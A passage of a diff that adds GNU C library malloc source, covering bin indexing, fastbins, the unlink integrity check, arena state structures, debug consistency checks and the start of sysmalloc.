+    But to conserve space and improve locality, we allocate
+    only the fd/bk pointers of bins, and then use repositioning tricks
+    to treat these as the fields of a malloc_chunk*.
+ */
+
+typedef struct malloc_chunk *mbinptr;
+
+/* addressing -- note that bin_at(0) does not exist */
+#define bin_at(m, i) \
+  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))			      \
+             - offsetof (struct malloc_chunk, fd))
+
+/* analog of ++bin */
+#define next_bin(b)  ((mbinptr) ((char *) (b) + (sizeof (mchunkptr) << 1)))
+
+/* Reminders about list directionality within bins */
+#define first(b)     ((b)->fd)
+#define last(b)      ((b)->bk)
+
+/* Take a chunk off a bin list */
+#define unlink(AV, P, BK, FD) {                                            \
+    FD = P->fd;								      \
+    BK = P->bk;								      \
+    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))		      \
+      malloc_printerr (check_action, "corrupted double-linked list", P, AV);  \
+    else {								      \
+        FD->bk = BK;							      \
+        BK->fd = FD;							      \
+        if (!in_smallbin_range (P->size)				      \
+            && __builtin_expect (P->fd_nextsize != NULL, 0)) {		      \
+	    if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)	      \
+		|| __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))    \
+	      malloc_printerr (check_action,				      \
+			       "corrupted double-linked list (not small)",    \
+			       P, AV);					      \
+            if (FD->fd_nextsize == NULL) {				      \
+                if (P->fd_nextsize == P)				      \
+                  FD->fd_nextsize = FD->bk_nextsize = FD;		      \
+                else {							      \
+                    FD->fd_nextsize = P->fd_nextsize;			      \
+                    FD->bk_nextsize = P->bk_nextsize;			      \
+                    P->fd_nextsize->bk_nextsize = FD;			      \
+                    P->bk_nextsize->fd_nextsize = FD;			      \
+                  }							      \
+              } else {							      \
+                P->fd_nextsize->bk_nextsize = P->bk_nextsize;		      \
+                P->bk_nextsize->fd_nextsize = P->fd_nextsize;		      \
+              }								      \
+          }								      \
+      }									      \
+}
+
+/*
+   Indexing
+
+    Bins for sizes < 512 bytes contain chunks of all the same size, spaced
+    8 bytes apart. Larger bins are approximately logarithmically spaced:
+
+    64 bins of size       8
+    32 bins of size      64
+    16 bins of size     512
+     8 bins of size    4096
+     4 bins of size   32768
+     2 bins of size  262144
+     1 bin  of size what's left
+
+    There is actually a little bit of slop in the numbers in bin_index
+    for the sake of speed. This makes no difference elsewhere.
+
+    The bins top out around 1MB because we expect to service large
+    requests via mmap.
+
+    Bin 0 does not exist.  Bin 1 is the unordered list; if that would be
+    a valid chunk size the small bins are bumped up one.
+ */
+
+#define NBINS             128
+#define NSMALLBINS         64
+#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT
+#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ)
+#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)
+
+#define in_smallbin_range(sz)  \
+  ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)
+
+#define smallbin_index(sz) \
+  ((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\
+   + SMALLBIN_CORRECTION)
+
+#define largebin_index_32(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 38) ?  56 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index_32_big(sz)                                            \
+  (((((unsigned long) (sz)) >> 6) <= 45) ?  49 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+// XXX It remains to be seen whether it is good to keep the widths of
+// XXX the buckets the same or whether it should be scaled by a factor
+// XXX of two as well.
+#define largebin_index_64(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 48) ?  48 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index(sz) \
+  (SIZE_SZ == 8 ? largebin_index_64 (sz)                                     \
+   : MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz)                     \
+   : largebin_index_32 (sz))
+
+#define bin_index(sz) \
+  ((in_smallbin_range (sz)) ? smallbin_index (sz) : largebin_index (sz))
+
+
+/*
+   Unsorted chunks
+
+    All remainders from chunk splits, as well as all returned chunks,
+    are first placed in the "unsorted" bin. They are then placed
+    in regular bins after malloc gives them ONE chance to be used before
+    binning. So, basically, the unsorted_chunks list acts as a queue,
+    with chunks being placed on it in free (and malloc_consolidate),
+    and taken off (to be either used or placed in bins) in malloc.
+
+    The NON_MAIN_ARENA flag is never set for unsorted chunks, so it
+    does not have to be taken into account in size comparisons.
+ */
+
+/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */
+#define unsorted_chunks(M)          (bin_at (M, 1))
+
+/*
+   Top
+
+    The top-most available chunk (i.e., the one bordering the end of
+    available memory) is treated specially. It is never included in
+    any bin, is used only if no other chunk is available, and is
+    released back to the system if it is very large (see
+    M_TRIM_THRESHOLD).  Because top initially
+    points to its own bin with initial zero size, thus forcing
+    extension on the first malloc request, we avoid having any special
+    code in malloc to check whether it even exists yet. But we still
+    need to do so when getting memory from system, so we make
+    initial_top treat the bin as a legal but unusable chunk during the
+    interval between initialization and the first call to
+    sysmalloc. (This is somewhat delicate, since it relies on
+    the 2 preceding words to be zero during this interval as well.)
+ */
+
+/* Conveniently, the unsorted bin can be used as dummy top on first call */
+#define initial_top(M)              (unsorted_chunks (M))
+
+/*
+   Binmap
+
+    To help compensate for the large number of bins, a one-level index
+    structure is used for bin-by-bin searching.  `binmap' is a
+    bitvector recording whether bins are definitely empty so they can
+    be skipped over during during traversals.  The bits are NOT always
+    cleared as soon as bins are empty, but instead only
+    when they are noticed to be empty during traversal in malloc.
+ */
+
+/* Conservatively use 32 bits per map word, even if on 64bit system */
+#define BINMAPSHIFT      5
+#define BITSPERMAP       (1U << BINMAPSHIFT)
+#define BINMAPSIZE       (NBINS / BITSPERMAP)
+
+#define idx2block(i)     ((i) >> BINMAPSHIFT)
+#define idx2bit(i)       ((1U << ((i) & ((1U << BINMAPSHIFT) - 1))))
+
+#define mark_bin(m, i)    ((m)->binmap[idx2block (i)] |= idx2bit (i))
+#define unmark_bin(m, i)  ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))
+#define get_binmap(m, i)  ((m)->binmap[idx2block (i)] & idx2bit (i))
+
+/*
+   Fastbins
+
+    An array of lists holding recently freed small chunks.  Fastbins
+    are not doubly linked.  It is faster to single-link them, and
+    since chunks are never removed from the middles of these lists,
+    double linking is not necessary. Also, unlike regular bins, they
+    are not even processed in FIFO order (they use faster LIFO) since
+    ordering doesn't much matter in the transient contexts in which
+    fastbins are normally used.
+
+    Chunks in fastbins keep their inuse bit set, so they cannot
+    be consolidated with other free chunks. malloc_consolidate
+    releases all chunks in fastbins and consolidates them with
+    other free chunks.
+ */
+
+typedef struct malloc_chunk *mfastbinptr;
+#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx])
+
+/* offset 2 to use otherwise unindexable first 2 bins */
+#define fastbin_index(sz) \
+  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
+
+
+/* The maximum fastbin request size we support */
+#define MAX_FAST_SIZE     (80 * SIZE_SZ / 4)
+
+#define NFASTBINS  (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
+
+/*
+   FASTBIN_CONSOLIDATION_THRESHOLD is the size of a chunk in free()
+   that triggers automatic consolidation of possibly-surrounding
+   fastbin chunks. This is a heuristic, so the exact value should not
+   matter too much. It is defined at half the default trim threshold as a
+   compromise heuristic to only attempt consolidation if it is likely
+   to lead to trimming. However, it is not dynamically tunable, since
+   consolidation reduces fragmentation surrounding large chunks even
+   if trimming is not used.
+ */
+
+#define FASTBIN_CONSOLIDATION_THRESHOLD  (65536UL)
+
+/*
+   Since the lowest 2 bits in max_fast don't matter in size comparisons,
+   they are used as flags.
+ */
+
+/*
+   FASTCHUNKS_BIT held in max_fast indicates that there are probably
+   some fastbin chunks. It is set true on entering a chunk into any
+   fastbin, and cleared only in malloc_consolidate.
+
+   The truth value is inverted so that have_fastchunks will be true
+   upon startup (since statics are zero-filled), simplifying
+   initialization checks.
+ */
+
+#define FASTCHUNKS_BIT        (1U)
+
+#define have_fastchunks(M)     (((M)->flags & FASTCHUNKS_BIT) == 0)
+#define clear_fastchunks(M)    catomic_or (&(M)->flags, FASTCHUNKS_BIT)
+#define set_fastchunks(M)      catomic_and (&(M)->flags, ~FASTCHUNKS_BIT)
+
+/*
+   NONCONTIGUOUS_BIT indicates that MORECORE does not return contiguous
+   regions.  Otherwise, contiguity is exploited in merging together,
+   when possible, results from consecutive MORECORE calls.
+
+   The initial value comes from MORECORE_CONTIGUOUS, but is
+   changed dynamically if mmap is ever used as an sbrk substitute.
+ */
+
+#define NONCONTIGUOUS_BIT     (2U)
+
+#define contiguous(M)          (((M)->flags & NONCONTIGUOUS_BIT) == 0)
+#define noncontiguous(M)       (((M)->flags & NONCONTIGUOUS_BIT) != 0)
+#define set_noncontiguous(M)   ((M)->flags |= NONCONTIGUOUS_BIT)
+#define set_contiguous(M)      ((M)->flags &= ~NONCONTIGUOUS_BIT)
+
+/* ARENA_CORRUPTION_BIT is set if a memory corruption was detected on the
+   arena.  Such an arena is no longer used to allocate chunks.  Chunks
+   allocated in that arena before detecting corruption are not freed.  */
+
+#define ARENA_CORRUPTION_BIT (4U)
+
+#define arena_is_corrupt(A)	(((A)->flags & ARENA_CORRUPTION_BIT))
+#define set_arena_corrupt(A)	((A)->flags |= ARENA_CORRUPTION_BIT)
+
+/*
+   Set value of max_fast.
+   Use impossibly small value if 0.
+   Precondition: there are no existing fastbin chunks.
+   Setting the value clears fastchunk bit but preserves noncontiguous bit.
+ */
+
+#define set_max_fast(s) \
+  global_max_fast = (((s) == 0)						      \
+                     ? SMALLBIN_WIDTH : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))
+#define get_max_fast() global_max_fast
+
+
+/*
+   ----------- Internal state representation and initialization -----------
+ */
+
+struct malloc_state
+{
+  /* Serialize access.  */
+  mutex_t mutex;
+
+  /* Flags (formerly in max_fast).  */
+  int flags;
+
+  /* Fastbins */
+  mfastbinptr fastbinsY[NFASTBINS];
+
+  /* Base of the topmost chunk -- not otherwise kept in a bin */
+  mchunkptr top;
+
+  /* The remainder from the most recent split of a small request */
+  mchunkptr last_remainder;
+
+  /* Normal bins packed as described above */
+  mchunkptr bins[NBINS * 2 - 2];
+
+  /* Bitmap of bins */
+  unsigned int binmap[BINMAPSIZE];
+
+  /* Linked list */
+  struct malloc_state *next;
+
+  /* Linked list for free arenas.  Access to this field is serialized
+     by free_list_lock in arena.c.  */
+  struct malloc_state *next_free;
+
+  /* Number of threads attached to this arena.  0 if the arena is on
+     the free list.  Access to this field is serialized by
+     free_list_lock in arena.c.  */
+  INTERNAL_SIZE_T attached_threads;
+
+  /* Memory allocated from the system in this arena.  */
+  INTERNAL_SIZE_T system_mem;
+  INTERNAL_SIZE_T max_system_mem;
+};
+
+struct malloc_par
+{
+  /* Tunable parameters */
+  unsigned long trim_threshold;
+  INTERNAL_SIZE_T top_pad;
+  INTERNAL_SIZE_T mmap_threshold;
+  INTERNAL_SIZE_T arena_test;
+  INTERNAL_SIZE_T arena_max;
+
+  /* Memory map support */
+  int n_mmaps;
+  int n_mmaps_max;
+  int max_n_mmaps;
+  /* the mmap_threshold is dynamic, until the user sets
+     it manually, at which point we need to disable any
+     dynamic behavior. */
+  int no_dyn_threshold;
+
+  /* Statistics */
+  INTERNAL_SIZE_T mmapped_mem;
+  /*INTERNAL_SIZE_T  sbrked_mem;*/
+  /*INTERNAL_SIZE_T  max_sbrked_mem;*/
+  INTERNAL_SIZE_T max_mmapped_mem;
+  INTERNAL_SIZE_T max_total_mem;  /* only kept for NO_THREADS */
+
+  /* First address handed out by MORECORE/sbrk.  */
+  char *sbrk_base;
+};
+
+/* There are several instances of this struct ("arenas") in this
+   malloc.  If you are adapting this malloc in a way that does NOT use
+   a static or mmapped malloc_state, you MUST explicitly zero-fill it
+   before using. This malloc relies on the property that malloc_state
+   is initialized to all zeroes (as is true of C statics).  */
+
+static struct malloc_state main_arena =
+{
+  .mutex = _LIBC_LOCK_INITIALIZER,
+  .next = &main_arena,
+  .attached_threads = 1
+};
+
+/* There is only one instance of the malloc parameters.  */
+
+static struct malloc_par mp_ =
+{
+  .top_pad = DEFAULT_TOP_PAD,
+  .n_mmaps_max = DEFAULT_MMAP_MAX,
+  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
+  .trim_threshold = DEFAULT_TRIM_THRESHOLD,
+#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
+  .arena_test = NARENAS_FROM_NCORES (1)
+};
+
+
+/*  Non public mallopt parameters.  */
+#define M_ARENA_TEST -7
+#define M_ARENA_MAX  -8
+
+
+/* Maximum size of memory handled in fastbins.  */
+static INTERNAL_SIZE_T global_max_fast;
+
+/*
+   Initialize a malloc_state struct.
+
+   This is called only from within malloc_consolidate, which needs
+   be called in the same contexts anyway.  It is never called directly
+   outside of malloc_consolidate because some optimizing compilers try
+   to inline it at all call points, which turns out not to be an
+   optimization at all. (Inlining it in malloc_consolidate is fine though.)
+ */
+
+static void
+malloc_init_state (mstate av)
+{
+  int i;
+  mbinptr bin;
+
+  /* Establish circular links for normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      bin = bin_at (av, i);
+      bin->fd = bin->bk = bin;
+    }
+
+#if MORECORE_CONTIGUOUS
+  if (av != &main_arena)
+#endif
+  set_noncontiguous (av);
+  if (av == &main_arena)
+    set_max_fast (DEFAULT_MXFAST);
+  av->flags |= FASTCHUNKS_BIT;
+
+  av->top = initial_top (av);
+}
+
+/*
+   Other internal utilities operating on mstates
+ */
+
+static void *sysmalloc (INTERNAL_SIZE_T, mstate);
+static int      systrim (size_t, mstate);
+static void     malloc_consolidate (mstate);
+
+
+/* -------------- Early definitions for debugging hooks ---------------- */
+
+/* Define and initialize the hook variables.  These weak definitions must
+   appear before any use of the variables in a function (arena.c uses one).  */
+#ifndef weak_variable
+/* In GNU libc we want the hook variables to be weak definitions to
+   avoid a problem with Emacs.  */
+# define weak_variable weak_function
+#endif
+
+/* Forward declarations.  */
+static void *malloc_hook_ini (size_t sz,
+                              const void *caller) __THROW;
+static void *realloc_hook_ini (void *ptr, size_t sz,
+                               const void *caller) __THROW;
+static void *memalign_hook_ini (size_t alignment, size_t sz,
+                                const void *caller) __THROW;
+
+void weak_variable (*__malloc_initialize_hook) (void) = NULL;
+void weak_variable (*__free_hook) (void *__ptr,
+                                   const void *) = NULL;
+void *weak_variable (*__malloc_hook)
+  (size_t __size, const void *) = malloc_hook_ini;
+void *weak_variable (*__realloc_hook)
+  (void *__ptr, size_t __size, const void *)
+  = realloc_hook_ini;
+void *weak_variable (*__memalign_hook)
+  (size_t __alignment, size_t __size, const void *)
+  = memalign_hook_ini;
+void weak_variable (*__after_morecore_hook) (void) = NULL;
+
+
+/* ---------------- Error behavior ------------------------------------ */
+
+#ifndef DEFAULT_CHECK_ACTION
+# define DEFAULT_CHECK_ACTION 3
+#endif
+
+static int check_action = DEFAULT_CHECK_ACTION;
+
+
+/* ------------------ Testing support ----------------------------------*/
+
+static int perturb_byte;
+
+static void
+alloc_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte ^ 0xff, n);
+}
+
+static void
+free_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte, n);
+}
+
+
+
+#include <stap-probe.h>
+
+/* ------------------- Support for multiple arenas -------------------- */
+#include "arena.c"
+
+/*
+   Debugging support
+
+   These routines make a number of assertions about the states
+   of data structures that should be true at all times. If any
+   are not true, it's very likely that a user program has somehow
+   trashed memory. (It's also possible that there is a coding error
+   in malloc. In which case, please report it!)
+ */
+
+#if !MALLOC_DEBUG
+
+# define check_chunk(A, P)
+# define check_free_chunk(A, P)
+# define check_inuse_chunk(A, P)
+# define check_remalloced_chunk(A, P, N)
+# define check_malloced_chunk(A, P, N)
+# define check_malloc_state(A)
+
+#else
+
+# define check_chunk(A, P)              do_check_chunk (A, P)
+# define check_free_chunk(A, P)         do_check_free_chunk (A, P)
+# define check_inuse_chunk(A, P)        do_check_inuse_chunk (A, P)
+# define check_remalloced_chunk(A, P, N) do_check_remalloced_chunk (A, P, N)
+# define check_malloced_chunk(A, P, N)   do_check_malloced_chunk (A, P, N)
+# define check_malloc_state(A)         do_check_malloc_state (A)
+
+/*
+   Properties of all chunks
+ */
+
+static void
+do_check_chunk (mstate av, mchunkptr p)
+{
+  unsigned long sz = chunksize (p);
+  /* min and max possible addresses assuming contiguous allocation */
+  char *max_address = (char *) (av->top) + chunksize (av->top);
+  char *min_address = max_address - av->system_mem;
+
+  if (!chunk_is_mmapped (p))
+    {
+      /* Has legal address ... */
+      if (p != av->top)
+        {
+          if (contiguous (av))
+            {
+              assert (((char *) p) >= min_address);
+              assert (((char *) p + sz) <= ((char *) (av->top)));
+            }
+        }
+      else
+        {
+          /* top size is always at least MINSIZE */
+          assert ((unsigned long) (sz) >= MINSIZE);
+          /* top predecessor always marked inuse */
+          assert (prev_inuse (p));
+        }
+    }
+  else
+    {
+      /* address is outside main heap  */
+      if (contiguous (av) && av->top != initial_top (av))
+        {
+          assert (((char *) p) < min_address || ((char *) p) >= max_address);
+        }
+      /* chunk is page-aligned */
+      assert (((p->prev_size + sz) & (GLRO (dl_pagesize) - 1)) == 0);
+      /* mem is aligned */
+      assert (aligned_OK (chunk2mem (p)));
+    }
+}
+
+/*
+   Properties of free chunks
+ */
+
+static void
+do_check_free_chunk (mstate av, mchunkptr p)
+{
+  INTERNAL_SIZE_T sz = p->size & ~(PREV_INUSE | NON_MAIN_ARENA);
+  mchunkptr next = chunk_at_offset (p, sz);
+
+  do_check_chunk (av, p);
+
+  /* Chunk must claim to be free ... */
+  assert (!inuse (p));
+  assert (!chunk_is_mmapped (p));
+
+  /* Unless a special marker, must have OK fields */
+  if ((unsigned long) (sz) >= MINSIZE)
+    {
+      assert ((sz & MALLOC_ALIGN_MASK) == 0);
+      assert (aligned_OK (chunk2mem (p)));
+      /* ... matching footer field */
+      assert (next->prev_size == sz);
+      /* ... and is fully consolidated */
+      assert (prev_inuse (p));
+      assert (next == av->top || inuse (next));
+
+      /* ... and has minimally sane links */
+      assert (p->fd->bk == p);
+      assert (p->bk->fd == p);
+    }
+  else /* markers are always of size SIZE_SZ */
+    assert (sz == SIZE_SZ);
+}
+
+/*
+   Properties of inuse chunks
+ */
+
+static void
+do_check_inuse_chunk (mstate av, mchunkptr p)
+{
+  mchunkptr next;
+
+  do_check_chunk (av, p);
+
+  if (chunk_is_mmapped (p))
+    return; /* mmapped chunks have no next/prev */
+
+  /* Check whether it claims to be in use ... */
+  assert (inuse (p));
+
+  next = next_chunk (p);
+
+  /* ... and is surrounded by OK chunks.
+     Since more things can be checked with free chunks than inuse ones,
+     if an inuse chunk borders them and debug is on, it's worth doing them.
+   */
+  if (!prev_inuse (p))
+    {
+      /* Note that we cannot even look at prev unless it is not inuse */
+      mchunkptr prv = prev_chunk (p);
+      assert (next_chunk (prv) == p);
+      do_check_free_chunk (av, prv);
+    }
+
+  if (next == av->top)
+    {
+      assert (prev_inuse (next));
+      assert (chunksize (next) >= MINSIZE);
+    }
+  else if (!inuse (next))
+    do_check_free_chunk (av, next);
+}
+
+/*
+   Properties of chunks recycled from fastbins
+ */
+
+static void
+do_check_remalloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  INTERNAL_SIZE_T sz = p->size & ~(PREV_INUSE | NON_MAIN_ARENA);
+
+  if (!chunk_is_mmapped (p))
+    {
+      assert (av == arena_for_chunk (p));
+      if (chunk_non_main_arena (p))
+        assert (av != &main_arena);
+      else
+        assert (av == &main_arena);
+    }
+
+  do_check_inuse_chunk (av, p);
+
+  /* Legal size ... */
+  assert ((sz & MALLOC_ALIGN_MASK) == 0);
+  assert ((unsigned long) (sz) >= MINSIZE);
+  /* ... and alignment */
+  assert (aligned_OK (chunk2mem (p)));
+  /* chunk is less than MINSIZE more than request */
+  assert ((long) (sz) - (long) (s) >= 0);
+  assert ((long) (sz) - (long) (s + MINSIZE) < 0);
+}
+
+/*
+   Properties of nonrecycled chunks at the point they are malloced
+ */
+
+static void
+do_check_malloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  /* same as recycled case ... */
+  do_check_remalloced_chunk (av, p, s);
+
+  /*
+     ... plus,  must obey implementation invariant that prev_inuse is
+     always true of any allocated chunk; i.e., that each allocated
+     chunk borders either a previously allocated and still in-use
+     chunk, or the base of its memory arena. This is ensured
+     by making all allocations from the `lowest' part of any found
+     chunk.  This does not necessarily hold however for chunks
+     recycled via fastbins.
+   */
+
+  assert (prev_inuse (p));
+}
+
+
+/*
+   Properties of malloc_state.
+
+   This may be useful for debugging malloc, as well as detecting user
+   programmer errors that somehow write into malloc_state.
+
+   If you are extending or experimenting with this malloc, you can
+   probably figure out how to hack this routine to print out or
+   display chunk addresses, sizes, bins, and other instrumentation.
+ */
+
+static void
+do_check_malloc_state (mstate av)
+{
+  int i;
+  mchunkptr p;
+  mchunkptr q;
+  mbinptr b;
+  unsigned int idx;
+  INTERNAL_SIZE_T size;
+  unsigned long total = 0;
+  int max_fast_bin;
+
+  /* internal size_t must be no wider than pointer type */
+  assert (sizeof (INTERNAL_SIZE_T) <= sizeof (char *));
+
+  /* alignment is a power of 2 */
+  assert ((MALLOC_ALIGNMENT & (MALLOC_ALIGNMENT - 1)) == 0);
+
+  /* cannot run remaining checks until fully initialized */
+  if (av->top == 0 || av->top == initial_top (av))
+    return;
+
+  /* pagesize is a power of 2 */
+  assert (powerof2(GLRO (dl_pagesize)));
+
+  /* A contiguous main_arena is consistent with sbrk_base.  */
+  if (av == &main_arena && contiguous (av))
+    assert ((char *) mp_.sbrk_base + av->system_mem ==
+            (char *) av->top + chunksize (av->top));
+
+  /* properties of fastbins */
+
+  /* max_fast is in allowed range */
+  assert ((get_max_fast () & ~1) <= request2size (MAX_FAST_SIZE));
+
+  max_fast_bin = fastbin_index (get_max_fast ());
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      p = fastbin (av, i);
+
+      /* The following test can only be performed for the main arena.
+         While mallopt calls malloc_consolidate to get rid of all fast
+         bins (especially those larger than the new maximum) this does
+         only happen for the main arena.  Trying to do this for any
+         other arena would mean those arenas have to be locked and
+         malloc_consolidate be called for them.  This is excessive.  And
+         even if this is acceptable to somebody it still cannot solve
+         the problem completely since if the arena is locked a
+         concurrent malloc call might create a new arena which then
+         could use the newly invalid fast bins.  */
+
+      /* all bins past max_fast are empty */
+      if (av == &main_arena && i > max_fast_bin)
+        assert (p == 0);
+
+      while (p != 0)
+        {
+          /* each chunk claims to be inuse */
+          do_check_inuse_chunk (av, p);
+          total += chunksize (p);
+          /* chunk belongs in this bin */
+          assert (fastbin_index (chunksize (p)) == i);
+          p = p->fd;
+        }
+    }
+
+  if (total != 0)
+    assert (have_fastchunks (av));
+  else if (!have_fastchunks (av))
+    assert (total == 0);
+
+  /* check normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+
+      /* binmap is accurate (except for bin 1 == unsorted_chunks) */
+      if (i >= 2)
+        {
+          unsigned int binbit = get_binmap (av, i);
+          int empty = last (b) == b;
+          if (!binbit)
+            assert (empty);
+          else if (!empty)
+            assert (binbit);
+        }
+
+      for (p = last (b); p != b; p = p->bk)
+        {
+          /* each chunk claims to be free */
+          do_check_free_chunk (av, p);
+          size = chunksize (p);
+          total += size;
+          if (i >= 2)
+            {
+              /* chunk belongs in bin */
+              idx = bin_index (size);
+              assert (idx == i);
+              /* lists are sorted */
+              assert (p->bk == b ||
+                      (unsigned long) chunksize (p->bk) >= (unsigned long) chunksize (p));
+
+              if (!in_smallbin_range (size))
+                {
+                  if (p->fd_nextsize != NULL)
+                    {
+                      if (p->fd_nextsize == p)
+                        assert (p->bk_nextsize == p);
+                      else
+                        {
+                          if (p->fd_nextsize == first (b))
+                            assert (chunksize (p) < chunksize (p->fd_nextsize));
+                          else
+                            assert (chunksize (p) > chunksize (p->fd_nextsize));
+
+                          if (p == first (b))
+                            assert (chunksize (p) > chunksize (p->bk_nextsize));
+                          else
+                            assert (chunksize (p) < chunksize (p->bk_nextsize));
+                        }
+                    }
+                  else
+                    assert (p->bk_nextsize == NULL);
+                }
+            }
+          else if (!in_smallbin_range (size))
+            assert (p->fd_nextsize == NULL && p->bk_nextsize == NULL);
+          /* chunk is followed by a legal chain of inuse chunks */
+          for (q = next_chunk (p);
+               (q != av->top && inuse (q) &&
+                (unsigned long) (chunksize (q)) >= MINSIZE);
+               q = next_chunk (q))
+            do_check_inuse_chunk (av, q);
+        }
+    }
+
+  /* top chunk is OK */
+  check_chunk (av, av->top);
+}
+#endif
+
+
+/* ----------------- Support for debugging hooks -------------------- */
+#include "hooks.c"
+
+
+/* ----------- Routines dealing with system allocation -------------- */
+
+/*
+   sysmalloc handles malloc cases requiring more memory from the system.
+   On entry, it is assumed that av->top does not have enough
+   space to service request for nb bytes, thus requiring that av->top
+   be extended or replaced.
+ */
+
+static void *
+sysmalloc (INTERNAL_SIZE_T nb, mstate av)
+{
+  mchunkptr old_top;              /* incoming value of av->top */
+  INTERNAL_SIZE_T old_size;       /* its size */
+  char *old_end;                  /* its end address */
+
+  long size;                      /* arg to first MORECORE or mmap call */
+  char *brk;                      /* return value from MORECORE */
+
+  long correction;                /* arg to 2nd MORECORE call */
+  char *snd_brk;                  /* 2nd return val */
+
+  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
+  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
+  char *aligned_brk;              /* aligned offset into brk */
+
+  mchunkptr p;                    /* the allocated/returned chunk */
+  mchunkptr remainder;            /* remainder from allocation */
+  unsigned long remainder_size;   /* its size */
+
+
+  size_t pagesize = GLRO (dl_pagesize);
+  bool tried_mmap = false;
+
+
+  /*
+     If have mmap, and the request size meets the mmap threshold, and
+     the system supports mmap, and there are few enough currently
+     allocated mmapped regions, try to directly map this request
+     rather than expanding top.
+   */
+
+  if (av == NULL
+      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
+	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
+    {
+      char *mm;           /* return value from mmap call*/
+
+    try_mmap:
+      /*
+         Round up size to nearest page.  For mmapped chunks, the overhead
+         is one SIZE_SZ unit larger than for normal chunks, because there
+         is no following chunk whose prev_size field could be used.
+
+         See the front_misalign handling below, for glibc there is no
+         need for further alignments unless we have have high alignment.
+       */
+      if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+        size = ALIGN_UP (nb + SIZE_SZ, pagesize);
+      else
+        size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
+      tried_mmap = true;
+
+      /* Don't try if size wraps around 0 */
+      if ((unsigned long) (size) > (unsigned long) (nb))
+        {
+          mm = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+          if (mm != MAP_FAILED)
+            {
+              /*
+                 The offset to the start of the mmapped region is stored
+                 in the prev_size field of the chunk. This allows us to adjust
+                 returned start address to meet alignment requirements here
+                 and in memalign(), and still be able to compute proper
+                 address argument for later munmap in free() and realloc().
+               */
+
+              if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                {
+                  /* For glibc, chunk2mem increases the address by 2*SIZE_SZ and
+                     MALLOC_ALIGN_MASK is 2*SIZE_SZ-1.  Each mmap'ed area is page
+                     aligned and therefore definitely MALLOC_ALIGN_MASK-aligned.  */
+                  assert (((INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK) == 0);
+                  front_misalign = 0;
+                }
+              else
+                front_misalign = (INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK;
+              if (front_misalign > 0)
+                {
+                  correction = MALLOC_ALIGNMENT - front_misalign;
+                  p = (mchunkptr) (mm + correction);
+                  p->prev_size = correction;
+                  set_head (p, (size - correction) | IS_MMAPPED);
+                }
+              else
+                {
+                  p = (mchunkptr) mm;
+                  set_head (p, size | IS_MMAPPED);
+                }
+
+              /* update statistics */
+
+              int new = atomic_exchange_and_add (&mp_.n_mmaps, 1) + 1;
+              atomic_max (&mp_.max_n_mmaps, new);
+
+              unsigned long sum;
